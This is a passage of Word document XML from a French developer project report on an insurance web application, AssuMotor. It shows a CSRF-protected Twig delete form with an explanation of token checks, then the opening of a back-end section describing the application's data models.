          <w:i/>
          <w:iCs/>
          <w:color w:val="008000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve"> #}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0097E684"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800000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>&lt;form</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method=</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE5980">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="0000FF"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>"post"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action=</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE5980">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="0000FF"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>"{{ path('</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00CE5980">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="0000FF"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>quote_delete</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00CE5980">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="0000FF"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>', {id: quote.id}) }}"</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE5980">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="800000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E7309F4"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&lt;input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type=</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE5980">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="0000FF"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>"hidden"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name=</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE5980">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="0000FF"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>"_token"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E51B1BA"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value=</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE5980">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="0000FF"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">"{{ </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00CE5980">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="0000FF"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>csrf_token</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00CE5980">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="0000FF"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>('delete-quote' ~ quote.id) }}"</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE5980">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="800000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F1C1AF1" w14:textId="77777777" w:rsidR="00D5693B" w:rsidRPr="00CE5980" w:rsidRDefault="00D5693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800000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>&lt;button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type=</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE5980">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="0000FF"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>"submit"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FF0000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>class=</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE5980">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="0000FF"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>"</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00CE5980">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="0000FF"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>btn</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00CE5980">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="0000FF"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00CE5980">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="0000FF"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>btn</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00CE5980">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="0000FF"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">-danger </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00CE5980">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="0000FF"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>btn-sm</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00CE5980">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="0000FF"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>"</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE5980">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="800000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>&gt;</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00CE5980">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Supprimer</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00CE5980">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="800000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>&lt;/button&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14425876" w14:textId="77777777" w:rsidR="00D5693B" w:rsidRDefault="00D5693B" w:rsidP="007922BB">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F5F5F5"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="800000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>&lt;/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="800000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>form</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="800000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72F22045" w14:textId="77777777" w:rsidR="003A6B7F" w:rsidRDefault="003A6B7F"/>
    <w:p w14:paraId="4DCCEE47" w14:textId="77777777" w:rsidR="003A6B7F" w:rsidRPr="00D5693B" w:rsidRDefault="003239D4" w:rsidP="00D5693B">
      <w:pPr>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D5693B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Points de sécurité :</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49DDF355" w14:textId="17FCEBE4" w:rsidR="003A6B7F" w:rsidRPr="00555B5E" w:rsidRDefault="003239D4" w:rsidP="007922BB">
      <w:pPr>
        <w:pStyle w:val="Index"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:firstLine="720"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:color w:val="D4D4D4"/>
          <w:lang w:eastAsia="fr-FR" w:bidi="ar-SA"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t>Chaque jeton est unique par action et par entité (ex : 'delete-quote42'). La vérification côté serveur est effectuée via</w:t>
      </w:r>
      <w:r w:rsidR="00895C1B">
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidR="00895C1B" w:rsidRPr="00895C1B">
        <w:rPr>
          <w:color w:val="569CD6"/>
          <w:lang w:eastAsia="fr-FR" w:bidi="ar-SA"/>
        </w:rPr>
        <w:t>$</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00895C1B" w:rsidRPr="00895C1B">
        <w:rPr>
          <w:color w:val="569CD6"/>
          <w:lang w:eastAsia="fr-FR" w:bidi="ar-SA"/>
        </w:rPr>
        <w:t>this</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00895C1B" w:rsidRPr="00895C1B">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:lang w:eastAsia="fr-FR" w:bidi="ar-SA"/>
        </w:rPr>
        <w:t>-&gt;</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00895C1B" w:rsidRPr="00895C1B">
        <w:rPr>
          <w:color w:val="C00000"/>
          <w:lang w:eastAsia="fr-FR" w:bidi="ar-SA"/>
        </w:rPr>
        <w:t>isCsrfTokenValid</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00895C1B" w:rsidRPr="00895C1B">
        <w:rPr>
          <w:color w:val="7030A0"/>
          <w:lang w:eastAsia="fr-FR" w:bidi="ar-SA"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidR="00895C1B" w:rsidRPr="00895C1B">
        <w:rPr>
          <w:color w:val="A66500"/>
          <w:lang w:eastAsia="fr-FR" w:bidi="ar-SA"/>
        </w:rPr>
        <w:t>'</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00895C1B" w:rsidRPr="00895C1B">
        <w:rPr>
          <w:color w:val="A66500"/>
          <w:lang w:eastAsia="fr-FR" w:bidi="ar-SA"/>
        </w:rPr>
        <w:t>delete-quote</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00895C1B" w:rsidRPr="00895C1B">
        <w:rPr>
          <w:color w:val="A66500"/>
          <w:lang w:eastAsia="fr-FR" w:bidi="ar-SA"/>
        </w:rPr>
        <w:t>'</w:t>
      </w:r>
      <w:r w:rsidR="00895C1B">
        <w:rPr>
          <w:color w:val="A66500"/>
          <w:lang w:eastAsia="fr-FR" w:bidi="ar-SA"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00895C1B" w:rsidRPr="00895C1B">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:lang w:eastAsia="fr-FR" w:bidi="ar-SA"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="00895C1B">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:lang w:eastAsia="fr-FR" w:bidi="ar-SA"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00895C1B" w:rsidRPr="00895C1B">
        <w:rPr>
          <w:color w:val="004E9A"/>
          <w:lang w:eastAsia="fr-FR" w:bidi="ar-SA"/>
        </w:rPr>
        <w:t>$</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00895C1B" w:rsidRPr="00895C1B">
        <w:rPr>
          <w:color w:val="004E9A"/>
          <w:lang w:eastAsia="fr-FR" w:bidi="ar-SA"/>
        </w:rPr>
        <w:t>quote</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00895C1B" w:rsidRPr="00895C1B">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:lang w:eastAsia="fr-FR" w:bidi="ar-SA"/>
        </w:rPr>
        <w:t>-&gt;</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00895C1B" w:rsidRPr="00895C1B">
        <w:rPr>
          <w:color w:val="990033"/>
          <w:lang w:eastAsia="fr-FR" w:bidi="ar-SA"/>
        </w:rPr>
        <w:t>getId</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00895C1B" w:rsidRPr="00895C1B">
        <w:rPr>
          <w:color w:val="FFB02F"/>
          <w:lang w:eastAsia="fr-FR" w:bidi="ar-SA"/>
        </w:rPr>
        <w:t>()</w:t>
      </w:r>
      <w:r w:rsidR="00895C1B" w:rsidRPr="00895C1B">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:lang w:eastAsia="fr-FR" w:bidi="ar-SA"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidR="00895C1B" w:rsidRPr="00895C1B">
        <w:rPr>
          <w:color w:val="D4D4D4"/>
          <w:lang w:eastAsia="fr-FR" w:bidi="ar-SA"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00895C1B" w:rsidRPr="00895C1B">
        <w:rPr>
          <w:color w:val="004E9A"/>
          <w:lang w:eastAsia="fr-FR" w:bidi="ar-SA"/>
        </w:rPr>
        <w:t>$</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00895C1B" w:rsidRPr="00895C1B">
        <w:rPr>
          <w:color w:val="004E9A"/>
          <w:lang w:eastAsia="fr-FR" w:bidi="ar-SA"/>
        </w:rPr>
        <w:t>submittedToken</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00895C1B" w:rsidRPr="00895C1B">
        <w:rPr>
          <w:color w:val="7030A0"/>
          <w:lang w:eastAsia="fr-FR" w:bidi="ar-SA"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
      <w:r w:rsidR="00895C1B" w:rsidRPr="00895C1B">
        <w:rPr>
          <w:color w:val="7030A0"/>
          <w:lang w:eastAsia="fr-FR" w:bidi="ar-SA"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00895C1B">
        <w:rPr>
          <w:color w:val="7030A0"/>
          <w:lang w:eastAsia="fr-FR" w:bidi="ar-SA"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>avant toute modification en base. Si le jeton est absent ou invalide, l'action est refusée et l'utilisateur est redirigé.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2521CEEE" w14:textId="77777777" w:rsidR="003B4764" w:rsidRDefault="003B4764" w:rsidP="003B4764">
      <w:pPr>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3C2D48F4" w14:textId="77777777" w:rsidR="003A6B7F" w:rsidRPr="00555B5E" w:rsidRDefault="003A6B7F">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="004E9A"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4F4EDCFB" w14:textId="77777777" w:rsidR="00B24687" w:rsidRPr="00555B5E" w:rsidRDefault="00B24687"/>
    <w:p w14:paraId="30547A21" w14:textId="77777777" w:rsidR="002A5F4C" w:rsidRDefault="003239D4">
      <w:pPr>
        <w:pStyle w:val="Titre1"/>
        <w:spacing w:before="0"/>
      </w:pPr>
      <w:bookmarkStart w:id="41" w:name="_Toc233817764"/>
      <w:r>
        <w:t>6. RÉALISATIONS BACK-END</w:t>
      </w:r>
      <w:bookmarkEnd w:id="41"/>
    </w:p>
    <w:p w14:paraId="69C0EFFB" w14:textId="77777777" w:rsidR="002A5F4C" w:rsidRDefault="003239D4">
      <w:pPr>
        <w:pStyle w:val="Titre2"/>
      </w:pPr>
      <w:bookmarkStart w:id="42" w:name="_Toc233817765"/>
      <w:r>
        <w:t>6.1 Mise en place de la base de données relationnelle</w:t>
      </w:r>
      <w:bookmarkEnd w:id="42"/>
    </w:p>
    <w:p w14:paraId="29C35E1B" w14:textId="77777777" w:rsidR="002A5F4C" w:rsidRPr="005B775B" w:rsidRDefault="003239D4" w:rsidP="003E5F6D">
      <w:pPr>
        <w:pStyle w:val="Titre3"/>
        <w:spacing w:after="240"/>
        <w:rPr>
          <w:color w:val="004E9A"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="43" w:name="_Toc233817766"/>
      <w:r w:rsidRPr="005B775B">
        <w:rPr>
          <w:color w:val="004E9A"/>
        </w:rPr>
        <w:t>6.1.1 Modèle Conceptuel de Données (MCD)</w:t>
      </w:r>
      <w:bookmarkEnd w:id="43"/>
    </w:p>
    <w:p w14:paraId="46FDF731" w14:textId="77777777" w:rsidR="003A6B7F" w:rsidRDefault="003239D4" w:rsidP="007922BB">
      <w:pPr>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:firstLine="720"/>
      </w:pPr>
      <w:r>
        <w:t>Le diagramme ci-dessous représente le Modèle Conceptuel de Données (MCD) d'</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>AssuMotor</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">. Il modélise les entités métier et leurs associations avant toute considération technique. On y distingue les entités principales : User, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Quote</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Vehicle</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">, Formula, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Subscription</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">, Document, Brand, Model et </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>VehicleReference</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1800F449" w14:textId="77777777" w:rsidR="003A6B7F" w:rsidRDefault="003A6B7F"/>
    <w:p w14:paraId="77A8540E" w14:textId="54099645" w:rsidR="003A6B7F" w:rsidRDefault="00043C1E" w:rsidP="00043C1E">
      <w:pPr>
        <w:spacing w:before="120" w:after="480"/>
      </w:pPr>
      <w:r w:rsidRPr="00043C1E">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0ED6C46A" wp14:editId="6039C6D6">
            <wp:extent cx="5296172" cy="3930852"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1146491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1447" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId27"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5296172" cy="3930852"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FAD9E7E" w14:textId="77777777" w:rsidR="002A5F4C" w:rsidRPr="005B775B" w:rsidRDefault="003239D4" w:rsidP="007922BB">
      <w:pPr>
        <w:pStyle w:val="Titre3"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:color w:val="004E9A"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="44" w:name="_Toc233817767"/>
      <w:r w:rsidRPr="005B775B">
        <w:rPr>
          <w:color w:val="004E9A"/>
        </w:rPr>
        <w:t>6.1.2 Modèle Logique de Données (MLD)</w:t>
      </w:r>
      <w:bookmarkEnd w:id="44"/>
    </w:p>
    <w:p w14:paraId="12A5EF90" w14:textId="77777777" w:rsidR="003A6B7F" w:rsidRDefault="003239D4" w:rsidP="007922BB">
      <w:pPr>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:firstLine="720"/>
      </w:pPr>
      <w:r>
        <w:t>Le MLD ci-dessous est dérivé du MCD. Il matérialise les clés étrangères et précise les types de données de chaque attribut.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02E42C1A" w14:textId="77777777" w:rsidR="003A6B7F" w:rsidRDefault="003A6B7F"/>
    <w:p w14:paraId="067C8B2F" w14:textId="77777777" w:rsidR="003A6B7F" w:rsidRDefault="003239D4">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="00E3C0BB" wp14:editId="3C65718B">
            <wp:extent cx="5029200" cy="3882615"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1996574508" name="Picture 199657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5029200" cy="3882615"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="72F44438" w14:textId="77777777" w:rsidR="003A6B7F" w:rsidRDefault="003A6B7F"/>
    <w:p w14:paraId="7FE0572C" w14:textId="4AC562BD" w:rsidR="003E5F6D" w:rsidRPr="00C65F1A" w:rsidRDefault="003239D4" w:rsidP="003E5F6D">
      <w:pPr>
        <w:spacing w:after="240"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C65F1A">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">MLD </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00C65F1A">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>textuel</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00C65F1A">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> :</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="035F16C6" w14:textId="6AB21781"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User</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fname</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lname</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00CE5980">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="A31515"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>, email, password, roles)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71F95C5B" w14:textId="160F6C28"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Formula</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name, description TEXT, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00CE5980">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="A31515"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>base_price</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00CE5980">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="A31515"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45B2A170" w14:textId="12DD17E0"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Vehicle</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type, brand, model, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00CE5980">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="A31515"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>vehicle_year</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license_plate</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00CE5980">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="A31515"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70E82598" w14:textId="07903FAB"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Quote</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license_year</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birth_date</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00CE5980">
        <w:rPr>
